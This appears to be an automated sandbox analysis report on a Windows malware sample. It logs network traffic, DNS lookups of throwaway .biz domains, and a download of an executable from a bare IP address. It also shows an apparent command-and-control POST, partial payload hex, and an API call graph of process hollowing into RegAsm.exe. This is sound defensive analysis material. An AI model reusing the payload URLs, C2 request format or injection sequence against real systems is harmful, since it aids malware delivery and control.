                                      Dec 12, 2024 21:32:06.157279015 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.158962011 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.159063101 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.159343958 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.160878897 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.160994053 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.161890984 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.162842035 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.162966967 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.163053036 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.164781094 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.164926052 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.165123940 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.166799068 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.166944027 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.167007923 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.168693066 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.168766022 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.169826031 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.170574903 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.170711994 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.171339035 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.172707081 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.172785044 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.172844887 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.174907923 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.174988985 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.175211906 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.176893950 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.177007914 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.177279949 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.178916931 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.179157019 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.179337025 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.180830956 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.180907011 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.181305885 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.182637930 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.182794094 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.182862997 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.184473038 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.184657097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.185012102 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.186350107 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.186517954 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.186608076 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.188286066 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.188406944 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.188502073 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.190164089 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.190268993 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.190321922 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.192126036 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.192219019 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.192348957 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.194082022 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.194175959 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.194232941 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.195827961 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.195945024 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.196000099 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.197854042 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.197968006 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.198044062 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.199702978 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.199815989 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.199870110 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.201688051 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.201806068 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.201915026 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.203623056 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.203749895 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.204524994 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.205570936 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.205770016 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.206043959 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.207828045 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.207900047 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.207947969 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.209738970 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.209799051 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.209924936 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.211396933 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.211554050 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.212951899 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.213344097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.213454008 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.214042902 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.215336084 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.215517998 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.215826035 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.217276096 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.217336893 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.217417002 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.219158888 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.219400883 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.219515085 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.221127033 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.221244097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.221395969 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.223613024 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.223623991 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.223695040 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.902822971 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:08.185652018 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.185688972 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:08.185884953 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.187058926 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.187072992 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.569422960 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.569494963 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.573687077 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.573699951 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.574054003 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.625638008 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.625663996 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.625787973 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.590943098 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.591329098 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.591414928 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592809916 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592832088 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.592844963 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592852116 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.641232014 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641282082 CET44349706172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.641371965 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641768932 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641792059 CET44349706172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.939727068 CET49706443192.168.2.5172.67.206.64

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 12, 2024 21:32:06.957951069 CET5685953192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.174612999 CET53568591.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.176359892 CET5997853192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.405689955 CET53599781.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.412961960 CET5909253192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.634768963 CET53590921.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.639261007 CET5340653192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.867872000 CET53534061.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.871319056 CET5912253192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:08.179858923 CET53591221.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Dec 12, 2024 21:32:06.957951069 CET192.168.2.51.1.1.10xe8e4Standard query (0)zinc-sneark.bizA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.176359892 CET192.168.2.51.1.1.10x81c7Standard query (0)se-blurry.bizA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.412961960 CET192.168.2.51.1.1.10x17a2Standard query (0)dwell-exclaim.bizA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.639261007 CET192.168.2.51.1.1.10x481dStandard query (0)formy-spill.bizA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.871319056 CET192.168.2.51.1.1.10xb247Standard query (0)covery-mover.bizA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Dec 12, 2024 21:32:07.174612999 CET1.1.1.1192.168.2.50xe8e4Name error (3)zinc-sneark.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.405689955 CET1.1.1.1192.168.2.50x81c7Name error (3)se-blurry.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.634768963 CET1.1.1.1192.168.2.50x17a2Name error (3)dwell-exclaim.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:07.867872000 CET1.1.1.1192.168.2.50x481dName error (3)formy-spill.biznonenoneA (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:08.179858923 CET1.1.1.1192.168.2.50xb247No error (0)covery-mover.biz172.67.206.64A (IP address)IN (0x0001)false
                                      Dec 12, 2024 21:32:08.179858923 CET1.1.1.1192.168.2.50xb247No error (0)covery-mover.biz104.21.58.186A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • covery-mover.biz
                                      • 147.45.44.131

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704147.45.44.131804144C:\Users\user\Desktop\htZgRRla8S.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 12, 2024 21:32:04.093641043 CET180OUTGET /infopage/ung0.exe HTTP/1.1
                                      X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                      Host: 147.45.44.131
                                      Connection: Keep-Alive
                                      Dec 12, 2024 21:32:05.359586954 CET1236INHTTP/1.1 200 OK
                                      Date: Thu, 12 Dec 2024 20:32:05 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                      ETag: "48e00-628ee8f9c1375"
                                      Accept-Ranges: bytes
                                      Content-Length: 298496
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: application/x-msdos-program
                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d [TRUNCATED]
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@p@0x9,.text `.rdata "@@.data P@.CRT R@@.relocx90:T@B
                                      Dec 12, 2024 21:32:05.359735012 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]SGqt%E.]S$qEu
                                      Dec 12, 2024 21:32:05.359747887 CET1236INData Raw: c4 04 85 c0 0f 84 61 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 45 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 4d 6c 00 00 83 c4 04 39 c3 0f 85 6a 02 00 00 8b 1e 0f b6 2b 55 e8 e7
                                      Data Ascii: a@HEEU\$PMl9j+UltC+UlCuK<:5Ct$V@PWt$x&.]SltE.]SmlEuM,E.]S
                                      Dec 12, 2024 21:32:05.360157967 CET1236INData Raw: 74 09 83 79 04 02 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 18 d9 ee dd 5c 24 10 83 7c 24 2c 00 74 36 8b 74 24 30 85 f6 74 2e 56 e8 7e 67 00 00 83 c4 04 89 44 24 04 50 56 e8 d0 08 00 00 8b 4c 24 34 83 c4 08 89 c2 8b
                                      Data Ascii: tyuAUSWV\$|$,t6t$0t.V~gD$PVL$4i ]D$sD$^_[]!AD$$CMt#D$t$<tA9uA4VgT$L$0;D$ut$Vt$8gT$L$8uAtx
                                      Dec 12, 2024 21:32:05.360388994 CET1236INData Raw: cc cc cc cc 55 53 57 56 83 ec 10 31 c0 83 7c 24 24 00 74 38 8b 74 24 28 85 f6 74 30 56 e8 c2 62 00 00 83 c4 04 89 44 24 04 50 56 e8 14 04 00 00 8b 4c 24 2c 83 c4 08 89 c2 8b 59 20 8d 6b ff 89 d8 83 e8 01 89 44 24 0c 73 0a 31 c0 83 c4 10 5e 5f 5b
                                      Data Ascii: USWV1|$$t8t$(t0VbD$PVL$,Y kD$s1^_[]!AD$$EKt#D$t$<tA9uA4VVbT$L$(;D$ut$Vt$0WbT$L$0uAt1T$,9QpL$1tT$9
                                      Dec 12, 2024 21:32:05.360409021 CET1236INData Raw: 00 00 00 29 d8 b9 cd cc cc cc f7 e1 89 d5 c1 ed 03 89 6c 24 20 8d 04 9d 00 00 00 00 50 ff 15 04 20 44 00 83 c4 04 89 c6 89 44 24 08 c1 e5 02 55 ff 15 04 20 44 00 83 c4 04 89 44 24 2c 89 44 24 10 55 ff 15 04 20 44 00 83 c4 04 89 c7 89 44 24 14 55
                                      Data Ascii: )l$ P DD$U DD$,D$U DD$U D$D$U|$0 DD$~v<$tptlFFFFFFF u|$(t
                                      Dec 12, 2024 21:32:05.360455990 CET776INData Raw: 89 f8 eb 0e ff 34 24 ff 15 00 20 44 00 83 c4 04 31 c0 83 c4 14 5e 5f 5b 5d c3 cc cc 55 53 57 56 8b 74 24 14 0f be 0e bf ff ff ff ff 85 c9 0f 84 1b 01 00 00 0f be 56 01 85 d2 0f 84 0f 01 00 00 0f be 46 02 85 c0 0f 84 03 01 00 00 0f be 76 03 85 f6
                                      Data Ascii: 4$ D1^_[]USWVt$VFvw#wrw#wrw#wr
                                      Dec 12, 2024 21:32:05.360467911 CET1236INData Raw: 35 89 74 24 08 f7 dd 31 c0 89 da 90 90 90 90 90 90 90 90 90 0f b6 32 42 01 f7 01 f9 48 39 c5 75 f3 8b 6c 24 04 29 c5 8b 74 24 08 83 fe fc 0f 87 e0 fe ff ff eb 0d 89 c5 89 da 83 fe fc 0f 87 d1 fe ff ff 8b 04 24 29 e8 31 ed 90 90 90 90 90 90 90 90
                                      Data Ascii: 5t$12BH9ul$)t$$)14*|*t*|*9u^_[]USWVL$tLT$D$tB1113<C!13C
                                      Dec 12, 2024 21:32:05.361282110 CET1236INData Raw: 90 00 00 00 8d 14 2b 4a 81 e2 ff 7f 00 00 0f b6 94 16 90 00 00 00 29 7c 24 0c 01 df 89 7e 20 8b 74 24 04 3b 74 24 10 0f 84 94 00 00 00 89 7c 24 08 01 dd c1 e1 05 31 d1 8b 74 24 54 8b 54 24 04 eb 47 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f b6
                                      Data Ascii: +J)|$~ t$;t$|$1t$TT$G1Nrf~rBfNrE@;T$t'.w.\$T$L$T$L$p|$UsD$)
                                      Dec 12, 2024 21:32:05.361294031 CET1236INData Raw: 88 54 24 03 0f b6 84 06 90 00 00 00 88 44 24 20 89 7c 24 08 89 c8 8b 4c 24 2c f7 d9 8b 7c 24 14 89 ce 0f 82 82 fe ff ff eb 12 89 7c 24 08 8b 44 24 1c 8b 7c 24 14 90 90 90 90 90 90 83 f8 03 0f 94 c1 8b 5c 24 08 81 fb 00 20 00 00 0f 93 c2 84 d1 75
                                      Data Ascii: T$D$ |$L$,|$|$D$|$\$ u9tD$$t{svl$TM(U<D$0]LU<CM(YU(JE(U,U84U8=jCt$l$TM(U<9
                                      Dec 12, 2024 21:32:05.479578972 CET1236INData Raw: 00 10 00 00 74 0a 83 7e 64 00 0f 84 11 01 00 00 31 c0 83 fd 04 0f 94 c0 8b 5e 44 89 d9 d3 e0 0b 46 48 89 c7 89 46 48 43 89 5e 44 83 fb 08 73 4b 8b 6e 30 31 c0 84 d2 75 71 f6 46 0a 04 75 48 83 7e 3c 2f 76 42 56 e8 fd 2c 00 00 eb 40 90 90 90 90 90
                                      Data Ascii: t~d1^DFHFHC^DsKn01uqFuH~</vBV,@HN0^DFHFH^DvF0;F4rV+(V7N<tV0)B9rN+N@;N$v(n0~H^DV'Vs7n0~HCFDs]


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549705172.67.206.644435596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-12 20:32:09 UTC263OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8
                                      Host: covery-mover.biz
                                      2024-12-12 20:32:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                      Data Ascii: act=life
                                      2024-12-12 20:32:10 UTC1008INHTTP/1.1 200 OK
                                      Date: Thu, 12 Dec 2024 20:32:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ssdfi33vdg4rogpdk88i292lk7; expires=Mon, 07-Apr-2025 14:18:49 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzcFCnDato8NNHzxvvWrsAceHp4ikss3CO53FznUfeiUIgnkwcIn1DX4hPcWiJd%2F0lz3j8m4RCqRiPJMqMOa217WSjiXJZhEhL9Zo%2FY2s%2Fw7N9vMsQaaVUrsGCD9HLG9Z2pR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f107b6d8c0318f2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1530&rtt_var=765&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4224&recv_bytes=907&delivery_rate=28678&cwnd=232&unsent_bytes=0&cid=13260a738a397a10&ts=1143&x=0"
                                      2024-12-12 20:32:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                      Data Ascii: 2ok
                                      2024-12-12 20:32:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:15:32:02
                                      Start date:12/12/2024
                                      Path:C:\Users\user\Desktop\htZgRRla8S.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\htZgRRla8S.exe"
                                      Imagebase:0xcf0000
                                      File size:45'568 bytes
                                      MD5 hash:B1BECDBFF2A34334AE4FF5F387115EC3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
                                      Imagebase:0xd10000
                                      File size:2'141'552 bytes
                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"
                                      Imagebase:0x820000
                                      File size:46'832 bytes
                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:15:32:06
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                      Imagebase:0x8e0000
                                      File size:65'440 bytes
                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:18.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:114
                                        Total number of Limit Nodes:3
                                        execution_graph 2033 1802bf1 2035 1802bbe 2033->2035 2034 1802bc6 2034->2034 2035->2034 2063 1802810 2035->2063 2067 1802805 2035->2067 2036 1802c75 2044 1802edf 2036->2044 2061 18023f0 Wow64SetThreadContext 2036->2061 2062 18023e8 Wow64SetThreadContext 2036->2062 2037 1802cdf 2037->2044 2047 1802670 ReadProcessMemory 2037->2047 2048 1802678 ReadProcessMemory 2037->2048 2038 1802d24 2038->2044 2059 18024c1 VirtualAllocEx 2038->2059 2060 18024c8 VirtualAllocEx 2038->2060 2039 1802d87 2039->2044 2045 1802581 WriteProcessMemory 2039->2045 2046 1802588 WriteProcessMemory 2039->2046 2040 1802e57 2057 1802581 WriteProcessMemory 2040->2057 2058 1802588 WriteProcessMemory 2040->2058 2041 1802dae 2041->2040 2041->2044 2055 1802581 WriteProcessMemory 2041->2055 2056 1802588 WriteProcessMemory 2041->2056 2042 1802e80 2042->2044 2049 18023f0 Wow64SetThreadContext 2042->2049 2050 18023e8 Wow64SetThreadContext 2042->2050 2043 1802eca 2043->2044 2053 1802340 ResumeThread 2043->2053 2054 1802339 ResumeThread 2043->2054 2045->2041 2046->2041 2047->2038 2048->2038 2049->2043 2050->2043 2053->2044 2054->2044 2055->2041 2056->2041 2057->2042 2058->2042 2059->2039 2060->2039 2061->2037 2062->2037 2064 1802899 CreateProcessA 2063->2064 2066 1802a5b 2064->2066 2068 1802810 CreateProcessA 2067->2068 2070 1802a5b 2068->2070 2071 1802b88 2073 